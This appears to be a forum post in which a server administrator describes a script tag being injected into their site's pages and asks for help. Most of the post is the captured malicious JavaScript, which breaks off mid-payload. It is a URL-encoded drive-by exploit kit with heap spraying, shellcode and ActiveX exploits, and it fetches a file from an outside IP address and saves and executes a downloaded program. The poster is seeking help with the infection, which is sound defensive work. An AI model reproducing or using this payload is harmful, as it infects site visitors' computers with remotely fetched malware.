Dynamic javascript injection - Malware
 

Hi All,

Architecture overview:

Redhat Enterprise Linux v3 Update 9 server running behind Foundry load balancer. The server has been updated with the latest patches from Redhat. Apache version is 2.0.46. We are also running Coldfusion MX 7 on the server and using PHP to serve dynamic content.

Problem description:

Earlier this week, our users started reporting that they were getting active-x prompts for Microsoft Data Access Component installation. In addition some of them were getting hit byt the RTSP bug (quicktime) and some were getting the JS/Explot-BO.gen alerts via McAfee. Upon troubleshooting, we see that irrespective of the page type (simple html, php, cfm, etc) at times a script tag similar to the one below is inserted right after the <body> tag.

<script language='JavaScript' type='text/javascript' src='shfuy.js'></script>

The javascript file name changes and the problem only occurs at times. There is no set pattern to reproduce the problem although I have noticed that if I connect to the server via a new IP address from my DSL connection, I get the javascript in the source.

I ran some sniffer traces on the server and my laptop. This showed that the javascript was being sent by the server. I was able to capture the javascript (contents of the javascript below). If anybody wants to see the sniffer traces, please let me know and I can provide download links.

We also saw a post at Bloodhound virus - Web Hosting Forum - Web hosting discussion at SiteGround.com which shows similar problem. Unfortunately the solution (use grsecurity kernel) does not makes any sense and I suspect that it would be a temp solution.

Solutions tried:
I have checked for the filenames but they do not exist on the server.

1) Have run chkrootkit and rootkit hunter - All clean
2) Have run clamav - All clean
3) Have run f-prot - All clean
4) Manually compiled Apache 2.0.59 + PHP 5.2.3 - Problem persists.

Would appreciate if anybody could provide some inputs on what we might be dealing with and how to resolve the problem.

Javascript code:
var arg="akmukvfd";
var MU = "http://" + window.location.hostname + "/" + arg;
var MH = '';
for (i=0; i < MU.length; i++)
{
var b = MU.charCodeAt (i);
MH = MH + b.toString (16);
}
MH = MH.toUpperCase();
if (Math.round(MU.length/2) != (MU.length/2))
{
MH += '00';
}

var MR = '';
for (i=0; i < MH.length; i += 4)
{
MR = MR + '%u' + MH.substring(i+2, i+4) + MH.substring(i, i+2);
}

var MU2 = "\"" + MU + "\"";
var MR2 = "\"" + MR + "\"";

var SB =
unescape ('%0a%3c%68%74%6d%6c%3e%0a%3c%62%6f%64%79%3e%0a%3c %64%69%76%20%69%64%3d%22%6d%79%64%69%76%22%3e%3c%2 f%64%69%76%3e%0a%0a%3c%73%63%72%69%70%74%20%6c%61% 6e%67%75%61%67%65%3d%22%4a%61%76%61%53%63%72%69%70 %74%22%3e%0a%0a%76%61%72%20%6d%65%6d%6f%72%79%20%3 d%20%6e%65%77%20%41%72%72%61%79%28%29%3b%0a%76%61% 72%20%6d%65%6d%5f%66%6c%61%67%20%3d%20%30%3b%0a%0a %66%75%6e%63%74%69%6f%6e%20%68%61%76%69%6e%67%28%2 9%20%7b%20%6d%65%6d%6f%72%79%3d%6d%65%6d%6f%72%79% 3b%20%73%65%74%54%69%6d%65%6f%75%74%28%22%68%61%76 %69%6e%67%28%29%22%2c%20%32%30%30%30%29%3b%20%7d%0 a%0a%66%75%6e%63%74%69%6f%6e%20%67%65%74%53%70%72% 61%79%53%6c%69%64%65%28%73%70%72%61%79%53%6c%69%64 %65%2c%20%73%70%72%61%79%53%6c%69%64%65%53%69%7a%6 5%29%0a%7b%0a%09%77%68%69%6c%65%20%28%73%70%72%61% 79%53%6c%69%64%65%2e%6c%65%6e%67%74%68%2a%32%3c%73 %70%72%61%79%53%6c%69%64%65%53%69%7a%65%29%0a%09%7 b%73%70%72%61%79%53%6c%69%64%65%20%2b%3d%20%73%70% 72%61%79%53%6c%69%64%65%3b%7d%0a%0a%09%73%70%72%61 %79%53%6c%69%64%65%20%3d%20%73%70%72%61%
79%53%6c%69%64%65%2e%73%75%62%73%74%72%69%6e%67%28 %30%2c%73%70%72%61%79%53%6c%69%64%65%53%69%7a%65%2 f%32%29%3b%0a%09%72%65%74%75%72%6e%20%73%70%72%61% 79%53%6c%69%64%65%3b%0a%7d%0a%0a%66%75%6e%63%74%69 %6f%6e%20%6d%61%6b%65%53%6c%69%64%65%28%29%0a%7b%0 a%09%76%61%72%20%68%65%61%70%53%70%72%61%79%54%6f% 41%64%64%72%65%73%73%20%3d%20%30%78%30%63%30%63%30 %63%30%63%3b%0a%09%76%61%72%20%70%61%79%4c%6f%61%6 4%43%6f%64%65%20%3d%20%75%6e%65%73%63%61%70%65%28% 22%25%75%34%33%34%33%25%75%34%33%34%33%25%75%30%66 %65%62%25%75%33%33%35%62%25%75%36%36%63%39%25%75%3 8%30%62%39%25%75%38%30%30%31%25%75%65%66%33%33%22% 20%2b%0a%22%25%75%65%32%34%33%25%75%65%62%66%61%25 %75%65%38%30%35%25%75%66%66%65%63%25%75%66%66%66%6 6%25%75%38%62%37%66%25%75%64%66%34%65%25%75%65%66% 65%66%25%75%36%34%65%66%25%75%65%33%61%66%25%75%39 %66%36%34%25%75%34%32%66%33%25%75%39%66%36%34%25%7 5%36%65%65%37%25%75%65%66%30%33%25%75%65%66%65%62% 22%20%2b%0a%22%25%75%36%34%65%66%25%75%62%39%30%33 %25%75%36%31%38%37%25%75%65%31%61%31%25%
75%30%37%30%33%25%75%65%66%31%31%25%75%65%66%65%66 %25%75%61%61%36%36%25%75%62%39%65%62%25%75%37%37%3 8%37%25%75%36%35%31%31%25%75%30%37%65%31%25%75%65% 66%31%66%25%75%65%66%65%66%25%75%61%61%36%36%25%75 %62%39%65%37%22%20%2b%0a%22%25%75%63%61%38%37%25%7 5%31%30%35%66%25%75%30%37%32%64%25%75%65%66%30%64% 25%75%65%66%65%66%25%75%61%61%36%36%25%75%62%39%65 %33%25%75%30%30%38%37%25%75%30%66%32%31%25%75%30%3 7%38%66%25%75%65%66%33%62%25%75%65%66%65%66%25%75% 61%61%36%36%25%75%62%39%66%66%25%75%32%65%38%37%25 %75%30%61%39%36%22%20%2b%0a%22%25%75%30%37%35%37%2 5%75%65%66%32%39%25%75%65%66%65%66%25%75%61%61%36% 36%25%75%61%66%66%62%25%75%64%37%36%66%25%75%39%61 %32%63%25%75%36%36%31%35%25%75%66%37%61%61%25%75%6 5%38%30%36%25%75%65%66%65%65%25%75%62%31%65%66%25% 75%39%61%36%36%25%75%36%34%63%62%25%75%65%62%61%61 %25%75%65%65%38%35%22%20%2b%0a%22%25%75%36%34%62%3 6%25%75%66%37%62%61%25%75%30%37%62%39%25%75%65%66% 36%34%25%75%65%66%65%66%25%75%38%37%62%66%25%75%66 %35%64%39%25%75%39%66%63%30%25%75%37%38%
30%37%25%75%65%66%65%66%25%75%36%36%65%66%25%75%66 %33%61%61%25%75%32%61%36%34%25%75%32%66%36%63%25%7 5%36%36%62%66%25%75%63%66%61%61%22%20%2b%0a%22%25% 75%31%30%38%37%25%75%65%66%65%66%25%75%62%66%65%66 %25%75%61%61%36%34%25%75%38%35%66%62%25%75%62%36%6 5%64%25%75%62%61%36%34%25%75%30%37%66%37%25%75%65% 66%38%65%25%75%65%66%65%66%25%75%61%61%65%63%25%75 %32%38%63%66%25%75%62%33%65%66%25%75%63%31%39%31%2 5%75%32%38%38%61%25%75%65%62%61%66%22%20%2b%0a%22% 25%75%38%61%39%37%25%75%65%66%65%66%25%75%39%61%31 %30%25%75%36%34%63%66%25%75%65%33%61%61%25%75%65%6 5%38%35%25%75%36%34%62%36%25%75%66%37%62%61%25%75% 61%66%30%37%25%75%65%66%65%66%25%75%38%35%65%66%25 %75%62%37%65%38%25%75%61%61%65%63%25%75%64%63%63%6 2%25%75%62%63%33%34%25%75%31%30%62%63%22%20%2b%0a% 22%25%75%63%66%39%61%25%75%62%63%62%66%25%75%61%61 %36%34%25%75%38%35%66%33%25%75%62%36%65%61%25%75%6 2%61%36%34%25%75%30%37%66%37%25%75%65%66%63%63%25% 75%65%66%65%66%25%75%65%66%38%35%25%75%39%61%31%30 %25%75%36%34%63%66%25%75%65%37%61%61%25%
75%65%64%38%35%25%75%36%34%62%36%25%75%66%37%62%61 %22%20%2b%0a%22%25%75%66%66%30%37%25%75%65%66%65%6 6%25%75%38%35%65%66%25%75%36%34%31%30%25%75%66%66% 61%61%25%75%65%65%38%35%25%75%36%34%62%36%25%75%66 %37%62%61%25%75%65%66%30%37%25%75%65%66%65%66%25%7 5%61%65%65%66%25%75%62%64%62%34%25%75%30%65%65%63% 25%75%30%65%65%63%25%75%30%65%65%63%25%75%30%65%65 %63%22%20%2b%0a%22%25%75%30%33%36%63%25%75%62%35%6 5%62%25%75%36%34%62%63%25%75%30%64%33%35%25%75%62% 64%31%38%25%75%30%66%31%30%25%75%36%34%62%61%25%75 %36%34%30%33%25%75%65%37%39%32%25%75%62%32%36%34%2 5%75%62%39%65%33%25%75%39%63%36%34%25%75%36%34%64% 33%25%75%66%31%39%62%25%75%65%63%39%37%25%75%62%39 %31%63%22%20%2b%0a%22%25%75%39%39%36%34%25%75%65%6 3%63%66%25%75%64%63%31%63%25%75%61%36%32%36%25%75% 34%32%61%65%25%75%32%63%65%63%25%75%64%63%62%39%25 %75%65%30%31%39%25%75%66%66%35%31%25%75%31%64%64%3 5%25%75%65%37%39%62%25%75%32%31%32%65%25%75%65%63% 65%32%25%75%61%66%31%64%25%75%31%65%30%34%25%75%31 %31%64%34%22%20%2b%0a%22%25%75%39%61%62%
31%25%75%62%35%30%61%25%75%30%34%36%34%25%75%62%35 %36%34%25%75%65%63%63%62%25%75%38%39%33%32%25%75%6 5%33%36%34%25%75%36%34%61%34%25%75%66%33%62%35%25% 75%33%32%65%63%25%75%65%62%36%34%25%75%65%63%36%34 %25%75%62%31%32%61%25%75%32%64%62%32%25%75%65%66%6 5%37%25%75%31%62%30%37%22%20%2b%0a%22%25%75%31%30% 31%31%25%75%62%61%31%30%25%75%61%33%62%64%25%75%61 %30%61%32%25%75%65%66%61%31%22%20%2b%20') +
MR2 +
unescape ('%29%3b%0a%09%76%61%72%20%68%65%61%70%42%6c%6f%63 %6b%53%69%7a%65%20%3d%20%30%78%34%30%30%30%30%30%3 b%0a%09%76%61%72%20%70%61%79%4c%6f%61%64%53%69%7a% 65%20%3d%20%70%61%79%4c%6f%61%64%43%6f%64%65%2e%6c %65%6e%67%74%68%20%2a%20%32%3b%0a%09%76%61%72%20%7 3%70%72%61%79%53%6c%69%64%65%53%69%7a%65%20%3d%20% 68%65%61%70%42%6c%6f%63%6b%53%69%7a%65%20%2d%20%28 %70%61%79%4c%6f%61%64%53%69%7a%65%2b%30%78%33%38%2 9%3b%0a%09%76%61%72%20%73%70%72%61%79%53%6c%69%64% 65%20%3d%20%75%6e%65%73%63%61%70%65%28%22%25%75%30 %63%30%63%25%75%30%63%30%63%22%29%3b%0a%0a%09%73%7 0%72%61%79%53%6c%69%64%65%20%3d%20%67%65%74%53%70% 72%61%79%53%6c%69%64%65%28%73%70%72%61%79%53%6c%69 %64%65%2c%73%70%72%61%79%53%6c%69%64%65%53%69%7a%6 5%29%3b%0a%09%68%65%61%70%42%6c%6f%63%6b%73%20%3d% 20%28%68%65%61%70%53%70%72%61%79%54%6f%41%64%64%72 %65%73%73%20%2d%20%30%78%34%30%30%30%30%30%29%2f%6 8%65%61%70%42%6c%6f%63%6b%53%69%7a%65%3b%0a%09%0a% 09%66%6f%72%20%28%69%3d%30%3b%69%3c%68%65%61%70%42 %6c%6f%63%6b%73%3b%69%2b%2b%29%0a%09%7b%
0a%09%09%6d%65%6d%6f%72%79%5b%69%5d%20%3d%20%73%70 %72%61%79%53%6c%69%64%65%20%2b%20%70%61%79%4c%6f%6 1%64%43%6f%64%65%3b%0a%09%7d%0a%0a%09%6d%65%6d%5f% 66%6c%61%67%20%3d%20%31%3b%0a%09%68%61%76%69%6e%67 %28%29%3b%0a%09%72%65%74%75%72%6e%20%6d%65%6d%6f%7 2%79%3b%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%73% 74%61%72%74%57%56%46%28%29%0a%7b%0a%09%66%6f%72%20 %28%69%3d%30%3b%69%3c%31%32%38%3b%69%2b%2b%29%0a%0 9%7b%0a%09%09%74%72%79%7b%20%0a%09%09%09%76%61%72% 20%74%61%72%20%3d%20%6e%65%77%20%41%63%74%69%76%65 %58%4f%62%6a%65%63%74%28%27%57%65%62%56%69%65%77%4 6%6f%6c%64%65%72%49%63%6f%6e%2e%57%65%62%56%69%65% 77%46%6f%6c%64%65%72%49%63%6f%6e%2e%31%27%29%3b%0a %09%09%09%74%61%72%2e%73%65%74%53%6c%69%63%65%28%3 0%78%37%66%66%66%66%66%66%65%2c%20%30%78%30%63%30% 63%30%63%30%63%2c%20%30%78%30%63%30%63%30%63%30%63 %2c%30%78%30%63%30%63%30%63%30%63%20%29%3b%20%0a%0 9%09%7d%63%61%74%63%68%28%65%29%7b%7d%0a%09%7d%0a% 7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%73%74%61%72%74 %57%69%6e%5a%69%70%28%6f%62%6a%65%63%74%
29%0a%7b%0a%09%76%61%72%20%78%68%20%3d%20%27%41%27 %3b%0a%09%77%68%69%6c%65%20%28%78%68%2e%6c%65%6e%6 7%74%68%20%3c%20%32%33%31%29%20%78%68%2b%3d%27%41% 27%3b%0a%09%78%68%2b%3d%22%5c%78%30%63%5c%78%30%63 %5c%78%30%63%5c%78%30%63%5c%78%30%63%5c%78%30%63%5 c%78%30%63%22%3b%0a%09%6f%62%6a%65%63%74%2e%43%72% 65%61%74%65%4e%65%77%46%6f%6c%64%65%72%46%72%6f%6d %4e%61%6d%65%28%78%68%29%3b%0a%7d%0a%0a%66%75%6e%6 3%74%69%6f%6e%20%73%74%61%72%74%4f%76%65%72%66%6c% 6f%77%28%6e%75%6d%29%0a%7b%0a%09%69%66%20%28%6e%75 %6d%20%3d%3d%20%30%29%20%7b%0a%09%09%74%72%79%20%7 b%0a%09%09%09%76%61%72%20%71%74%20%3d%20%6e%65%77% 20%41%63%74%69%76%65%58%4f%62%6a%65%63%74%28%27%51 %75%69%63%6b%54%69%6d%65%2e%51%75%69%63%6b%54%69%6 d%65%27%29%3b%09%09%0a%09%09%09%69%66%20%28%71%74% 29%20%7b%0a%09%09%09%09%76%61%72%20%71%74%68%74%6d %6c%20%3d%20%27%3c%6f%62%6a%65%63%74%20%43%4c%41%5 3%53%49%44%3d%22%63%6c%73%69%64%3a%30%32%42%46%32% 35%44%35%2d%38%43%31%37%2d%34%42%32%33%2d%42%43%38 %30%2d%44%33%34%38%38%41%42%44%44%43%36%
42%22%20%77%69%64%74%68%3d%22%31%22%20%68%65%69%67 %68%74%3d%22%31%22%20%73%74%79%6c%65%3d%22%62%6f%7 2%64%65%72%3a%30%70%78%22%3e%27%2b%0a%09%09%09%09% 27%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%22%73%72%63 %22%20%76%61%6c%75%65%3d%22%68%74%74%70%3a%2f%2f%3 6%36%2e%39%36%2e%32%31%38%2e%38%35%2f%64%6f%77%6e% 6c%6f%61%64%2f%31%36%37%32%31%32%2f%6d%6f%76%69%65 %2e%71%74%6c%22%3e%27%2b%0a%09%09%09%09%27%3c%70%6 1%72%61%6d%20%6e%61%6d%65%3d%22%61%75%74%6f%70%6c% 61%79%22%20%76%61%6c%75%65%3d%22%74%72%75%65%22%3e %27%2b%0a%09%09%09%09%27%3c%70%61%72%61%6d%20%6e%6 1%6d%65%3d%22%6c%6f%6f%70%22%20%76%61%6c%75%65%3d% 22%66%61%6c%73%65%22%3e%27%2b%0a%09%09%09%09%27%3c %70%61%72%61%6d%20%6e%61%6d%65%3d%22%63%6f%6e%74%7 2%6f%6c%6c%65%72%22%20%76%61%6c%75%65%3d%22%74%72% 75%65%22%3e%27%2b%0a%09%09%09%09%27%3c%2f%6f%62%6a %65%63%74%3e%27%3b%0a%09%09%09%09%69%66%20%28%21%2 0%6d%65%6d%5f%66%6c%61%67%29%20%6d%61%6b%65%53%6c% 69%64%65%28%29%3b%0a%09%09%09%09%64%6f%63%75%6d%65 %6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%
42%79%49%64%28%27%6d%79%64%69%76%27%29%2e%69%6e%6e %65%72%48%54%4d%4c%20%3d%20%71%74%68%74%6d%6c%3b%0 a%09%09%09%09%6e%75%6d%20%3d%20%32%35%35%3b%0a%09% 09%09%7d%0a%09%09%7d%20%63%61%74%63%68%28%65%29%20 %7b%20%7d%0a%0a%09%09%69%66%20%28%6e%75%6d%20%3d%2 0%32%35%35%29%20%73%65%74%54%69%6d%65%6f%75%74%28% 22%73%74%61%72%74%4f%76%65%72%66%6c%6f%77%28%31%29 %22%2c%20%32%30%30%30%29%3b%0a%09%09%65%6c%73%65%2 0%73%74%61%72%74%4f%76%65%72%66%6c%6f%77%28%31%29% 3b%0a%0a%09%7d%20%65%6c%73%65%20%69%66%20%28%6e%75 %6d%20%3d%3d%20%31%29%20%7b%0a%09%09%74%72%79%20%7 b%0a%09%09%09%76%61%72%20%77%69%6e%7a%69%70%20%3d% 20%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45 %6c%65%6d%65%6e%74%28%22%6f%62%6a%65%63%74%22%29%3 b%0a%09%09%09%77%69%6e%7a%69%70%2e%73%65%74%41%74% 74%72%69%62%75%74%65%28%22%63%6c%61%73%73%69%64%22 %2c%20%22%63%6c%73%69%64%3a%41%30%39%41%45%36%38%4 6%2d%42%31%34%44%2d%34%33%45%44%2d%42%37%31%33%2d% 42%41%34%31%33%46%30%33%34%39%30%34%22%29%3b%0a%0a %09%09%09%76%61%72%20%72%65%74%3d%77%69%
6e%7a%69%70%2e%43%72%65%61%74%65%4e%65%77%46%6f%6c %64%65%72%46%72%6f%6d%4e%61%6d%65%28%75%6e%65%73%6 3%61%70%65%28%22%25%30%30%22%29%29%3b%0a%09%09%09% 69%66%20%28%72%65%74%20%3d%3d%20%66%61%6c%73%65%29 %20%7b%0a%09%09%09%09%69%66%20%28%21%20%6d%65%6d%5 f%66%6c%61%67%29%20%6d%61%6b%65%53%6c%69%64%65%28% 29%3b%0a%09%09%09%09%73%74%61%72%74%57%69%6e%5a%69 %70%28%77%69%6e%7a%69%70%29%3b%0a%09%09%09%09%6e%7 5%6d%20%3d%20%32%35%35%3b%0a%09%09%09%7d%0a%0a%09% 09%7d%20%63%61%74%63%68%28%65%29%20%7b%20%7d%0a%0a %09%09%69%66%20%28%6e%75%6d%20%3d%20%32%35%35%29%2 0%73%65%74%54%69%6d%65%6f%75%74%28%22%73%74%61%72% 74%4f%76%65%72%66%6c%6f%77%28%32%29%22%2c%20%32%30 %30%30%29%3b%0a%09%09%65%6c%73%65%20%73%74%61%72%7 4%4f%76%65%72%66%6c%6f%77%28%32%29%3b%0a%0a%09%7d% 20%65%6c%73%65%20%69%66%20%28%6e%75%6d%20%3d%3d%20 %32%29%20%7b%0a%0a%09%09%74%72%79%20%7b%0a%09%09%0 9%76%61%72%20%74%61%72%20%3d%20%6e%65%77%20%41%63% 74%69%76%65%58%4f%62%6a%65%63%74%28%27%57%65%62%56 %69%65%77%46%6f%6c%64%65%72%49%63%6f%6e%
2e%57%65%62%56%69%65%77%46%6f%6c%64%65%72%49%63%6f %6e%2e%31%27%29%3b%0a%09%09%09%69%66%20%28%74%61%7 2%29%20%7b%0a%09%09%09%09%69%66%20%28%21%20%6d%65% 6d%5f%66%6c%61%67%29%20%6d%61%6b%65%53%6c%69%64%65 %28%29%3b%0a%09%09%09%09%73%74%61%72%74%57%56%46%2 8%29%3b%0a%09%09%09%7d%0a%09%09%7d%20%63%61%74%63% 68%28%65%29%20%7b%20%7d%0a%09%7d%0a%7d%0a%0a%0a%66 %75%6e%63%74%69%6f%6e%20%47%65%74%52%61%6e%64%53%7 4%72%69%6e%67%28%6c%65%6e%29%0a%7b%0a%09%76%61%72% 20%63%68%61%72%73%20%3d%20%22%61%62%63%64%65%66%67 %68%69%6b%6c%6d%6e%6f%70%71%72%73%74%75%76%77%78%7 9%7a%22%3b%0a%09%76%61%72%20%73%74%72%69%6e%67%5f% 6c%65%6e%67%74%68%20%3d%20%6c%65%6e%3b%0a%09%76%61 %72%20%72%61%6e%64%6f%6d%73%74%72%69%6e%67%20%3d%2 0%27%27%3b%0a%09%66%6f%72%20%28%76%61%72%20%69%3d% 30%3b%20%69%3c%73%74%72%69%6e%67%5f%6c%65%6e%67%74 %68%3b%20%69%2b%2b%29%20%7b%0a%09%09%76%61%72%20%7 2%6e%75%6d%20%3d%20%4d%61%74%68%2e%66%6c%6f%6f%72% 28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%20%2a%20 %63%68%61%72%73%2e%6c%65%6e%67%74%68%29%
3b%0a%09%09%72%61%6e%64%6f%6d%73%74%72%69%6e%67%20 %2b%3d%20%63%68%61%72%73%2e%73%75%62%73%74%72%69%6 e%67%28%72%6e%75%6d%2c%72%6e%75%6d%2b%31%29%3b%0a% 09%7d%0a%0a%09%72%65%74%75%72%6e%20%72%61%6e%64%6f %6d%73%74%72%69%6e%67%3b%0a%7d%0a%0a%66%75%6e%63%7 4%69%6f%6e%20%43%72%65%61%74%65%4f%62%6a%65%63%74% 28%43%4c%53%49%44%2c%20%6e%61%6d%65%29%20%7b%0a%09 %76%61%72%20%72%20%3d%20%6e%75%6c%6c%3b%0a%09%74%7 2%79%20%7b%20%65%76%61%6c%28%27%72%20%3d%20%43%4c% 53%49%44%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28 %6e%61%6d%65%29%27%29%20%7d%63%61%74%63%68%28%65%2 9%7b%7d%09%0a%09%69%66%20%28%21%20%72%29%20%7b%20% 74%72%79%20%7b%20%65%76%61%6c%28%27%72%20%3d%20%43 %4c%53%49%44%2e%43%72%65%61%74%65%4f%62%6a%65%63%7 4%28%6e%61%6d%65%2c%20%22%22%29%27%29%20%7d%63%61% 74%63%68%28%65%29%7b%7d%20%7d%0a%09%69%66%20%28%21 %20%72%29%20%7b%20%74%72%79%20%7b%20%65%76%61%6c%2 8%27%72%20%3d%20%43%4c%53%49%44%2e%43%72%65%61%74% 65%4f%62%6a%65%63%74%28%6e%61%6d%65%2c%20%22%22%2c %20%22%22%29%27%29%20%7d%63%61%74%63%68%
28%65%29%7b%7d%20%7d%0a%09%69%66%20%28%21%20%72%29 %20%7b%20%74%72%79%20%7b%20%65%76%61%6c%28%27%72%2 0%3d%20%43%4c%53%49%44%2e%47%65%74%4f%62%6a%65%63% 74%28%22%22%2c%20%6e%61%6d%65%29%27%29%20%7d%63%61 %74%63%68%28%65%29%7b%7d%20%7d%0a%09%69%66%20%28%2 1%20%72%29%20%7b%20%74%72%79%20%7b%20%65%76%61%6c% 28%27%72%20%3d%20%43%4c%53%49%44%2e%47%65%74%4f%62 %6a%65%63%74%28%6e%61%6d%65%2c%20%22%22%29%27%29%2 0%7d%63%61%74%63%68%28%65%29%7b%7d%20%7d%0a%09%69% 66%20%28%21%20%72%29%20%7b%20%74%72%79%20%7b%20%65 %76%61%6c%28%27%72%20%3d%20%43%4c%53%49%44%2e%47%6 5%74%4f%62%6a%65%63%74%28%6e%61%6d%65%29%27%29%20% 7d%63%61%74%63%68%28%65%29%7b%7d%20%7d%0a%09%72%65 %74%75%72%6e%28%72%29%3b%0a%7d%0a%0a%66%75%6e%63%7 4%69%6f%6e%20%58%4d%4c%48%74%74%70%44%6f%77%6e%6c% 6f%61%64%28%78%6d%6c%2c%20%75%72%6c%29%20%7b%0a%0a %09%74%72%79%20%7b%0a%09%09%78%6d%6c%2e%6f%70%65%6 e%28%22%47%45%54%22%2c%20%75%72%6c%2c%20%66%61%6c% 73%65%29%3b%0a%09%09%78%6d%6c%2e%73%65%6e%64%28%6e %75%6c%6c%29%3b%0a%0a%09%7d%20%63%61%74%
63%68%28%65%29%20%7b%20%72%65%74%75%72%6e%20%30%3b %20%7d%0a%0a%09%72%65%74%75%72%6e%20%78%6d%6c%2e%7 2%65%73%70%6f%6e%73%65%42%6f%64%79%3b%0a%7d%0a%0a% 66%75%6e%63%74%69%6f%6e%20%41%44%4f%42%44%53%74%72 %65%61%6d%53%61%76%65%28%6f%2c%20%6e%61%6d%65%2c%2 0%64%61%74%61%29%20%7b%0a%0a%09%74%72%79%20%7b%0a% 09%09%6f%2e%54%79%70%65%20%3d%20%31%3b%0a%09%09%6f %2e%4d%6f%64%65%20%3d%20%33%3b%0a%09%09%6f%2e%4f%7 0%65%6e%28%29%3b%0a%09%09%6f%2e%57%72%69%74%65%28% 64%61%74%61%29%3b%0a%09%09%6f%2e%53%61%76%65%54%6f %46%69%6c%65%28%6e%61%6d%65%2c%20%32%29%3b%0a%09%0 9%6f%2e%43%6c%6f%73%65%28%29%3b%0a%09%7d%20%63%61% 74%63%68%28%65%29%20%7b%20%72%65%74%75%72%6e%20%30 %3b%20%7d%0a%0a%09%72%65%74%75%72%6e%20%31%3b%0a%7 d%0a%0a%66%75%6e%63%74%69%6f%6e%20%53%68%65%6c%6c% 45%78%65%63%75%74%65%28%65%78%65%63%2c%20%6e%61%6d %65%2c%20%74%79%70%65%29%20%7b%0a%0a%09%69%66%20%2 8%74%79%70%65%20%3d%3d%20%30%29%20%7b%0a%09%09%74% 72%79%20%7b%20%65%78%65%63%2e%52%75%6e%28%6e%61%6d %65%2c%20%30%29%3b%20%72%65%74%75%72%6e%
20%31%3b%20%7d%20%63%61%74%63%68%28%65%29%20%7b%20 %7d%0a%09%7d%20%65%6c%73%65%20%7b%0a%09%09%74%72%7 9%20%7b%20%65%78%65%2e%53%68%65%6c%6c%45%78%65%63% 75%74%65%28%6e%61%6d%65%29%3b%20%72%65%74%75%72%6e %20%31%3b%20%7d%20%63%61%74%63%68%28%65%29%20%7b%2 0%7d%0a%09%7d%0a%0a%09%72%65%74%75%72%6e%28%30%29% 3b%0a%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%4d%44 %41%43%28%29%20%7b%0a%09%76%61%72%20%74%20%3d%20%6 e%65%77%20%41%72%72%61%79%28%27%7b%42%44%39%36%43% 35%35%36%2d%36%35%41%33%2d%31%31%44%30%2d%39%38%33 %41%2d%30%30%43%30%34%46%43%32%39%45%33%30%7d%27%2 c%20%27%7b%42%44%39%36%43%35%35%36%2d%36%35%41%33% 2d%31%31%44%30%2d%39%38%33%41%2d%30%30%43%30%34%46 %43%32%39%45%33%36%7d%27%2c%20%27%7b%41%42%39%42%4 3%45%44%44%2d%45%43%37%45%2d%34%37%45%31%2d%39%33% 32%32%2d%44%34%41%32%31%30%36%31%37%31%31%36%7d%27 %2c%20%27%7b%30%30%30%36%46%30%33%33%2d%30%30%30%3 0%2d%30%30%30%30%2d%43%30%30%30%2d%30%30%30%30%30% 30%30%30%30%30%34%36%7d%27%2c%20%27%7b%30%30%30%36 %46%30%33%41%2d%30%30%30%30%2d%30%30%30%
30%2d%43%30%30%30%2d%30%30%30%30%30%30%30%30%30%30 %34%36%7d%27%2c%20%27%7b%36%65%33%32%30%37%30%61%2 d%37%36%36%64%2d%34%65%65%36%2d%38%37%39%63%2d%64% 63%31%66%61%39%31%64%32%66%63%33%7d%27%2c%20%27%7b %36%34%31%34%35%31%32%42%2d%42%39%37%38%2d%34%35%3 1%44%2d%41%30%44%38%2d%46%43%46%44%46%33%33%45%38% 33%33%43%7d%27%2c%20%27%7b%37%46%35%42%37%46%36%33 %2d%46%30%36%46%2d%34%33%33%31%2d%38%41%32%36%2d%3 3%33%39%45%30%33%43%30%41%45%33%44%7d%27%2c%20%27% 7b%30%36%37%32%33%45%30%39%2d%46%34%43%32%2d%34%33 %63%38%2d%38%33%35%38%2d%30%39%46%43%44%31%44%42%3 0%37%36%36%7d%27%2c%20%27%7b%36%33%39%46%37%32%35% 46%2d%31%42%32%44%2d%34%38%33%31%2d%41%39%46%44%2d %38%37%34%38%34%37%36%38%32%30%31%30%7d%27%2c%20%2 7%7b%42%41%30%31%38%35%39%39%2d%31%44%42%33%2d%34% 34%66%39%2d%38%33%42%34%2d%34%36%31%34%35%34%43%38 %34%42%46%38%7d%27%2c%20%27%7b%44%30%43%30%37%44%3 5%36%2d%37%43%36%39%2d%34%33%46%31%2d%42%34%41%30% 2d%32%35%46%35%41%31%31%46%41%42%31%39%7d%27%2c%20 %27%7b%45%38%43%43%43%44%44%46%2d%43%41%
32%38%2d%34%39%36%62%2d%42%30%35%30%2d%36%43%30%37 %43%39%36%32%34%37%36%42%7d%27%2c%20%6e%75%6c%6c%2 9%3b%0a%09%76%61%72%20%76%20%3d%20%6e%65%77%20%41% 72%72%61%79%28%6e%75%6c%6c%2c%20%6e%75%6c%6c%2c%20 %6e%75%6c%6c%29%3b%0a%09%76%61%72%20%69%20%3d%20%3 0%3b%0a%09%76%61%72%20%6e%20%3d%20%30%3b%0a%09%76% 61%72%20%72%65%74%20%3d%20%30%3b%0a%09%76%61%72%20 %75%72%6c%52%65%61%6c%45%78%65%20%3d%20') +
MU2 +
unescape ('%3b%0a%0a%09%77%68%69%6c%65%20%28%74%5b%69%5d%20 %26%26%20%28%21%20%76%5b%30%5d%20%7c%7c%20%21%20%7 6%5b%31%5d%20%7c%7c%20%21%20%76%5b%32%5d%29%20%29% 20%7b%0a%09%09%76%61%72%20%61%20%3d%20%6e%75%6c%6c %3b%0a%0a%09%09%74%72%79%20%7b%0a%09%09%09%61%20%3 d%20%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65% 45%6c%65%6d%65%6e%74%28%22%6f%62%6a%65%63%74%22%29 %3b%0a%09%09%09%61%2e%73%65%74%41%74%74%72%69%62%7 5%74%65%28%22%63%6c%61%73%73%69%64%22%2c%20%22%63% 6c%73%69%64%3a%22%20%2b%20%74%5b%69%5d%2e%73%75%62 %73%74%72%69%6e%67%28%31%2c%20%74%5b%69%5d%2e%6c%6 5%6e%67%74%68%20%2d%20%31%29%29%3b%0a%09%09%7d%20% 63%61%74%63%68%28%65%29%20%7b%20%61%20%3d%20%6e%75 %6c%6c%3b%20%7d%0a%09%09%0a%09%09%69%66%20%28%61%2 9%20%7b%0a%09%09%09%69%66%20%28%21%20%76%5b%30%5d% 